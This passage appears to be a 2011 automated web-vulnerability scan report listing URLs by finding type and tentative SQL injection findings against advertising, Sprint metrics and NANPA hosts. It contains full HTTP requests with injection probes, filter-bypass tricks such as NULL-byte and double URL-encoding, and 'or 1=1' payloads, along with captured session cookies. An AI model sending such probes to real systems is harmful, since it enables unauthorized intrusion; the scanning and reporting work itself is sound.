24.32. http://www.dslreports.com/forum/r25728643-Nettalk-number-portability-

24.33. http://www.facebook.com/extern/login_status.php

24.34. http://www.google-analytics.com/__utm.gif

24.35. http://www.job-search-engine.com/keyword/number-portability/

24.36. http://www.linkedin.com/companyInsider

24.37. http://www.nanpa.org/forums/external.php

24.38. http://www.resourcenter.com/

24.39. http://www.secviz.org/node/89

24.40. http://www.stumbleupon.com/hostedbadge.php

24.41. http://www.vonage-forum.com/forum8.html

24.42. http://www.vonage.com/lp/US/afflpdc/

25. Cacheable HTTPS response

25.1. https://gvnwlnp.com/login.aspx

25.2. https://support.connexon.com/sd/AddSolution.sd

25.3. https://support.connexon.com/sd/Request.sd

25.4. https://support.connexon.com/sd/SolutionsHome.sd

25.5. https://www.nationalnanpa.com/nas/public/js/utilities.js

26. HTML does not specify charset

26.1. http://fls.doubleclick.net/activityi

26.2. https://lnp.activationnow.com/favicon.ico

26.3. http://nanpa.com/

26.4. http://nanpa.com/contact_us/mailing_list.html

26.5. http://nextelonline.nextel.com/tl/set_tl.html

26.6. http://now.eloqua.com/visitor/v200/svrGP.aspx

26.7. http://shop2.sprint.com/en/support/faq/wlnp.shtml

26.8. http://www.dslreports.com/forum/r25728643-Nettalk-number-portability-

26.9. http://www.nationalnanpa.com/contact_us/index.cgi

26.10. http://www.nationalnanpa.com/contact_us/index.html

26.11. http://www.nationalnanpa.com/nas/public/js/utilities.js

26.12. http://www.nationalnanpa.com/number_resource_info/area_code_maps.html

26.13. https://www.nationalnanpa.com/nas/public/js/utilities.js

27. Content type incorrectly stated

27.1. http://anpisolutions.app4.hubspot.com/salog.js.aspx

27.2. http://maps.googleapis.com/maps/api/js/AuthenticationService.Authenticate

27.3. http://mobilitypoint.westcon.com/favicon.ico

27.4. http://now.eloqua.com/visitor/v200/svrGP.aspx

27.5. http://shop2.sprint.com/favicon.ico

27.6. https://support.connexon.com/custom/customimages/911_logo_trc.jpg.gif

27.7. https://support.connexon.com/custom/customimages/Custom_HeadLogo.gif

27.8. http://support.sprint.com/favicon.ico

27.9. http://www.anpisolutions.com/wp-content/plugins/slidedeck-pro-for-wordpress/lib/slidedeck.jquery.js

27.10. http://www.anpisolutions.com/wp-content/uploads/favicon.ico

27.11. http://www.etalkup.com/formjsforoneutf8.aspx

27.12. http://www.etalkup.com/getpanelsdk.aspx

27.13. http://www.etalkup.com:8089/webclient/pagetrace

27.14. http://www.facebook.com/extern/login_status.php

27.15. http://www.google.com/mbd

27.16. http://www.google.com/search

27.17. http://www.linkedin.com/companyInsider

27.18. http://www.nanpa.org/forums/external.php

27.19. http://www.nationalnanpa.com/nas/public/assigned_code_query_step2.do

27.20. http://www.nationalnanpa.com/nas/public/js/utilities.js

27.21. https://www.nationalnanpa.com/nas/public/js/utilities.js

27.22. http://www.stumbleupon.com/hostedbadge.php

28. Content type is not specified



1. SQL injection  next
There are 5 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Remediation background

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://googleads.g.doubleclick.net/pagead/ads [frm parameter]  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The frm parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the frm parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /pagead/ads?client=ca-pub-5216754536572039&output=html&h=600&slotname=6042837393&w=120&lmt=1302640331&flash=10.2.154&url=http%3A%2F%2Fwww.dslreports.com%2Fforum%2Fr25728643-Nettalk-number-portability-&dt=1305161156429&bpp=3&shv=r20110427&jsv=r20110427&prev_slotnames=2685156739&correlator=1305161156578&frm=0%00'&adk=2740367379&ga_vid=1706444964.1305161155&ga_sid=1305161155&ga_hid=1276974030&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1049&bih=964&fu=0&ifi=2&dtd=267&xpc=YC4dXB2Vs1&p=http%3A//www.dslreports.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; __ar_v4=%7C33IKJE45JFAHDG4ETT36VB%3A20110502%3A1%7CGTBIFU6YRNFJRK4GS5AK4B%3A20110502%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110502%3A1%7CU6PZANHGRBHQFBIDRUUZ3E%3A20110502%3A1; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response 1

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Thu, 12 May 2011 00:59:14 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 9163

<html><head><style><!--
a:link { color: #ffffff }a:visited { color: #ffffff }a:hover { color: #ffffff }a:active { color: #ffffff } --></style><script><!--
(function(){window.ss=function(d,e){window.s
...[SNIP]...
<script>(function() {var f=function(e,b){var c=null,d=null;this.g=function(){var a=new Image(0,0);a.onload=a.onerror=a.onabort=function(){d=new Date};c=new Date;a.src=e};this.f=function(){if(c!=null&&d!=null)return[b,d-c].join("=");return b+"=-1"}},g=function(e,b,c){this.d=e;this.e=b;this.b=c;this.c=Math.floor(Math.
...[SNIP]...

Request 2

GET /pagead/ads?client=ca-pub-5216754536572039&output=html&h=600&slotname=6042837393&w=120&lmt=1302640331&flash=10.2.154&url=http%3A%2F%2Fwww.dslreports.com%2Fforum%2Fr25728643-Nettalk-number-portability-&dt=1305161156429&bpp=3&shv=r20110427&jsv=r20110427&prev_slotnames=2685156739&correlator=1305161156578&frm=0%00''&adk=2740367379&ga_vid=1706444964.1305161155&ga_sid=1305161155&ga_hid=1276974030&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1049&bih=964&fu=0&ifi=2&dtd=267&xpc=YC4dXB2Vs1&p=http%3A//www.dslreports.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; __ar_v4=%7C33IKJE45JFAHDG4ETT36VB%3A20110502%3A1%7CGTBIFU6YRNFJRK4GS5AK4B%3A20110502%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110502%3A1%7CU6PZANHGRBHQFBIDRUUZ3E%3A20110502%3A1; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response 2

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Thu, 12 May 2011 00:59:16 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 4872

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...

1.2. http://googleads.g.doubleclick.net/pagead/ads [ga_sid parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The ga_sid parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ga_sid parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the ga_sid request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /pagead/ads?client=ca-pub-5216754536572039&output=html&h=600&slotname=6042837393&w=120&lmt=1302640331&flash=10.2.154&url=http%3A%2F%2Fwww.dslreports.com%2Fforum%2Fr25728643-Nettalk-number-portability-&dt=1305161156429&bpp=3&shv=r20110427&jsv=r20110427&prev_slotnames=2685156739&correlator=1305161156578&frm=0&adk=2740367379&ga_vid=1706444964.1305161155&ga_sid=1305161155%2527&ga_hid=1276974030&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1049&bih=964&fu=0&ifi=2&dtd=267&xpc=YC4dXB2Vs1&p=http%3A//www.dslreports.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; __ar_v4=%7C33IKJE45JFAHDG4ETT36VB%3A20110502%3A1%7CGTBIFU6YRNFJRK4GS5AK4B%3A20110502%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110502%3A1%7CU6PZANHGRBHQFBIDRUUZ3E%3A20110502%3A1; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response 1

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Thu, 12 May 2011 01:01:27 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 5947

<html><head><script><!--
(function(){function a(c){this.t={};this.tick=function(d,e,b){var f=b?b:(new Date).getTime();this.t[d]=[f,e]};this.tick("start",null,c)}var g=new a;window.jstiming={Timer:a,lo
...[SNIP]...
"?v=3","&s="+(window.jstiming.sn||"pagead")+"&action=",b.name,j.length?"&it="+j.join(","):"","",f,"&rt=",m.join(",")].join("");a=new Image;var o=window.jstiming.c++;window.jstiming.a[o]=a;a.onload=a.onerror=function(){delete window.jstiming.a[o]};a.src=b;a=null;return b}};var i=window.jstiming.load;function l(b,a){var e=parseInt(b,10);if(e>
...[SNIP]...

Request 2

GET /pagead/ads?client=ca-pub-5216754536572039&output=html&h=600&slotname=6042837393&w=120&lmt=1302640331&flash=10.2.154&url=http%3A%2F%2Fwww.dslreports.com%2Fforum%2Fr25728643-Nettalk-number-portability-&dt=1305161156429&bpp=3&shv=r20110427&jsv=r20110427&prev_slotnames=2685156739&correlator=1305161156578&frm=0&adk=2740367379&ga_vid=1706444964.1305161155&ga_sid=1305161155%2527%2527&ga_hid=1276974030&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1049&bih=964&fu=0&ifi=2&dtd=267&xpc=YC4dXB2Vs1&p=http%3A//www.dslreports.com HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; __ar_v4=%7C33IKJE45JFAHDG4ETT36VB%3A20110502%3A1%7CGTBIFU6YRNFJRK4GS5AK4B%3A20110502%3A1%7CN34ZPOW5TRGMJKDEFHM2G4%3A20110502%3A1%7CU6PZANHGRBHQFBIDRUUZ3E%3A20110502%3A1; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response 2

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Thu, 12 May 2011 01:01:28 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 1600

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...

1.3. http://metrics.sprint.com/b/ss/sprintuniversalsiteprod/1/H.22.1/s83234283372294 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://metrics.sprint.com
Path:   /b/ss/sprintuniversalsiteprod/1/H.22.1/s83234283372294

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /b%00'/ss/sprintuniversalsiteprod/1/H.22.1/s83234283372294?AQB=1&ndh=1&t=11%2F4%2F2011%2019%3A46%3A22%203%20300&ce=UTF-8&pageName=SU%20%3A%20SE%20%3A%20ART%20%3A%20case-wh164052-20100420-140547%20-%20Bring%20your%20existing%20number%20to%20Sprint&g=http%3A%2F%2Fsupport.sprint.com%2Fsupport%2Farticle%2FBring_your_existing_number_to_Sprint%2Fcase-wh164052-20100420-140547&r=http%3A%2F%2Fshop2.sprint.com%2Fen%2Fsupport%2Ffaq%2Fwlnp.shtml&cc=USD&ch=Support&server=support.sprint.com&events=event14&h1=Support%7CSU%20%3A%20Services%7CSU%20%3A%20Articles&h2=D%3Dg&c3=Not%20Authenticated&c4=SU%20%3A%20Services&c9=not%20logged-in&v13=D%3Dc40&v14=D%3Dc9&v20=D%3Dc3&c21=case-wh164052-20100420-140547&v29=D%3Dc43&v30=D%3Dch&c40=SU%20%3A%20Articles&c42=Shockwave%20Flash%2010.2%20r154&c43=support.sprint.com&v44=34CE0D747C31107C188BD6527E05D4BF&c45=Support%2BSU%20%3A%20SE%20%3A%20ART%20%3A%20case-wh164052-20100420-140547%20-%20Bring%20your%20existing%20number%20to%20Sprint&c46=7%3A30PM&c47=Wednesday&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1065&bh=964&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: metrics.sprint.com
Proxy-Connection: keep-alive
Referer: http://support.sprint.com/support/article/Bring_your_existing_number_to_Sprint/case-wh164052-20100420-140547
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=34CE0D747C31107C188BD6527E05D4BF; TLisset=true; s_cc=true; gpv_p37=Support; gpv_p38=SU%20%3A%20SE%20%3A%20ART%20%3A%20case-wh164052-20100420-140547%20-%20Bring%20your%20existing%20number%20to%20Sprint

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 01:34:41 GMT
Server: Omniture DC/2.0.0
Content-Length: 397
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b%00''/ss/sprintuniversalsiteprod/1/H.22.1/s83234283372294?AQB=1&ndh=1&t=11%2F4%2F2011%2019%3A46%3A22%203%20300&ce=UTF-8&pageName=SU%20%3A%20SE%20%3A%20ART%20%3A%20case-wh164052-20100420-140547%20-%20Bring%20your%20existing%20number%20to%20Sprint&g=http%3A%2F%2Fsupport.sprint.com%2Fsupport%2Farticle%2FBring_your_existing_number_to_Sprint%2Fcase-wh164052-20100420-140547&r=http%3A%2F%2Fshop2.sprint.com%2Fen%2Fsupport%2Ffaq%2Fwlnp.shtml&cc=USD&ch=Support&server=support.sprint.com&events=event14&h1=Support%7CSU%20%3A%20Services%7CSU%20%3A%20Articles&h2=D%3Dg&c3=Not%20Authenticated&c4=SU%20%3A%20Services&c9=not%20logged-in&v13=D%3Dc40&v14=D%3Dc9&v20=D%3Dc3&c21=case-wh164052-20100420-140547&v29=D%3Dc43&v30=D%3Dch&c40=SU%20%3A%20Articles&c42=Shockwave%20Flash%2010.2%20r154&c43=support.sprint.com&v44=34CE0D747C31107C188BD6527E05D4BF&c45=Support%2BSU%20%3A%20SE%20%3A%20ART%20%3A%20case-wh164052-20100420-140547%20-%20Bring%20your%20existing%20number%20to%20Sprint&c46=7%3A30PM&c47=Wednesday&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1065&bh=964&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: metrics.sprint.com
Proxy-Connection: keep-alive
Referer: http://support.sprint.com/support/article/Bring_your_existing_number_to_Sprint/case-wh164052-20100420-140547
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=34CE0D747C31107C188BD6527E05D4BF; TLisset=true; s_cc=true; gpv_p37=Support; gpv_p38=SU%20%3A%20SE%20%3A%20ART%20%3A%20case-wh164052-20100420-140547%20-%20Bring%20your%20existing%20number%20to%20Sprint

Response 2

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 01:34:41 GMT
Server: Omniture DC/2.0.0
xserver: www612
Content-Length: 0
Content-Type: text/html


1.4. http://metrics.sprint.com/b/ss/sprintuniversalsiteprod/1/H.22.1/s83234283372294 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://metrics.sprint.com
Path:   /b/ss/sprintuniversalsiteprod/1/H.22.1/s83234283372294

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /b/ss%00'/sprintuniversalsiteprod/1/H.22.1/s83234283372294?AQB=1&ndh=1&t=11%2F4%2F2011%2019%3A46%3A22%203%20300&ce=UTF-8&pageName=SU%20%3A%20SE%20%3A%20ART%20%3A%20case-wh164052-20100420-140547%20-%20Bring%20your%20existing%20number%20to%20Sprint&g=http%3A%2F%2Fsupport.sprint.com%2Fsupport%2Farticle%2FBring_your_existing_number_to_Sprint%2Fcase-wh164052-20100420-140547&r=http%3A%2F%2Fshop2.sprint.com%2Fen%2Fsupport%2Ffaq%2Fwlnp.shtml&cc=USD&ch=Support&server=support.sprint.com&events=event14&h1=Support%7CSU%20%3A%20Services%7CSU%20%3A%20Articles&h2=D%3Dg&c3=Not%20Authenticated&c4=SU%20%3A%20Services&c9=not%20logged-in&v13=D%3Dc40&v14=D%3Dc9&v20=D%3Dc3&c21=case-wh164052-20100420-140547&v29=D%3Dc43&v30=D%3Dch&c40=SU%20%3A%20Articles&c42=Shockwave%20Flash%2010.2%20r154&c43=support.sprint.com&v44=34CE0D747C31107C188BD6527E05D4BF&c45=Support%2BSU%20%3A%20SE%20%3A%20ART%20%3A%20case-wh164052-20100420-140547%20-%20Bring%20your%20existing%20number%20to%20Sprint&c46=7%3A30PM&c47=Wednesday&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1065&bh=964&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: metrics.sprint.com
Proxy-Connection: keep-alive
Referer: http://support.sprint.com/support/article/Bring_your_existing_number_to_Sprint/case-wh164052-20100420-140547
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=34CE0D747C31107C188BD6527E05D4BF; TLisset=true; s_cc=true; gpv_p37=Support; gpv_p38=SU%20%3A%20SE%20%3A%20ART%20%3A%20case-wh164052-20100420-140547%20-%20Bring%20your%20existing%20number%20to%20Sprint

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 01:35:07 GMT
Server: Omniture DC/2.0.0
Content-Length: 400
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss%00''/sprintuniversalsiteprod/1/H.22.1/s83234283372294?AQB=1&ndh=1&t=11%2F4%2F2011%2019%3A46%3A22%203%20300&ce=UTF-8&pageName=SU%20%3A%20SE%20%3A%20ART%20%3A%20case-wh164052-20100420-140547%20-%20Bring%20your%20existing%20number%20to%20Sprint&g=http%3A%2F%2Fsupport.sprint.com%2Fsupport%2Farticle%2FBring_your_existing_number_to_Sprint%2Fcase-wh164052-20100420-140547&r=http%3A%2F%2Fshop2.sprint.com%2Fen%2Fsupport%2Ffaq%2Fwlnp.shtml&cc=USD&ch=Support&server=support.sprint.com&events=event14&h1=Support%7CSU%20%3A%20Services%7CSU%20%3A%20Articles&h2=D%3Dg&c3=Not%20Authenticated&c4=SU%20%3A%20Services&c9=not%20logged-in&v13=D%3Dc40&v14=D%3Dc9&v20=D%3Dc3&c21=case-wh164052-20100420-140547&v29=D%3Dc43&v30=D%3Dch&c40=SU%20%3A%20Articles&c42=Shockwave%20Flash%2010.2%20r154&c43=support.sprint.com&v44=34CE0D747C31107C188BD6527E05D4BF&c45=Support%2BSU%20%3A%20SE%20%3A%20ART%20%3A%20case-wh164052-20100420-140547%20-%20Bring%20your%20existing%20number%20to%20Sprint&c46=7%3A30PM&c47=Wednesday&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1065&bh=964&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: metrics.sprint.com
Proxy-Connection: keep-alive
Referer: http://support.sprint.com/support/article/Bring_your_existing_number_to_Sprint/case-wh164052-20100420-140547
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=34CE0D747C31107C188BD6527E05D4BF; TLisset=true; s_cc=true; gpv_p37=Support; gpv_p38=SU%20%3A%20SE%20%3A%20ART%20%3A%20case-wh164052-20100420-140547%20-%20Bring%20your%20existing%20number%20to%20Sprint

Response 2

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 01:35:07 GMT
Server: Omniture DC/2.0.0
xserver: www617
Content-Length: 0
Content-Type: text/html


1.5. http://www.nationalnanpa.com/nas/public/assigned_code_query_step1.do [codeQueryModel.stateAbbr parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.nationalnanpa.com
Path:   /nas/public/assigned_code_query_step1.do

Issue detail

The codeQueryModel.stateAbbr parameter appears to be vulnerable to SQL injection attacks. The payloads 13320976'%20or%201%3d1--%20 and 13320976'%20or%201%3d2--%20 were each submitted in the codeQueryModel.stateAbbr parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

